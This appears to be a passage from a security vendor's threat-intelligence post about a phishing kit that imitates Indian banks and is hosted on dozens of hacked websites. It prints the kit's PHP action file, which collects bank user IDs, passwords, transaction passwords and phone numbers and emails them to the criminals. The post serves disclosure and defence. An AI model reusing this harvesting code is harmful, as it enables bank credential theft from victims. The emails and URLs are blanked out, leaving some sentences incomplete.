For each of the icons on the list below, a full corresponding phishing site is offered. For some reason, the "western" banks on the list do NOT go to a phishing site, but provide a link directly to the brand indicated, These "non-phish" (mostly western banks, but some Indian as well) would include Barclays, Citibank, Deutsche Bank, Karnataka Bank, Karur Vysya Bank, Lakshmi Vilas Bank, RBS, Standard Charter, and Tamilnad Mercantile Bank.

(Screen shot of phish on "")

The same set of phishing files is regularly occurring in our Phishing intelligence system with more than 80 websites having been hacked to host these files.

Because Malcovery is REALLY good at recovering phishing kits, we were able to recover the criminals' email addresses in 15 of the 80 websites.,, and were found in 11 of those 15.

In November, the "action file" of these phish sent email to four email addresses, as shown above, and as observed by the investigators at More recently, the "" address has been excluded from the kit.

For example, for the phishing site:

The action file was:

<$fromemail = "$ip";
$ip = getenv("REMOTE_ADDR");
$message  = "-----------------+ Andhra Bank Details +-----------------\n";
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$message .= "Transaction Password: " .$_POST['pass2']."\n";
$message .= "Mobile: " .$_POST['mobile']."\n";
$message .= "Client IP      : $ip\n";
$message .= "-----------------+ Created in 2012 By DON PERO------------------\n";

$recipient = ",,,";
$subject = "Andhra $ip";
$headers = "From:";
$headers .= $fromemail."\n";
$headers .= "MIME-Version: 1.0\n";

if (mail($recipient,$subject,$message,$headers)) 
   {     header("Location:");    }else    

    {   echo "ERROR! Please go back and try again.";      }>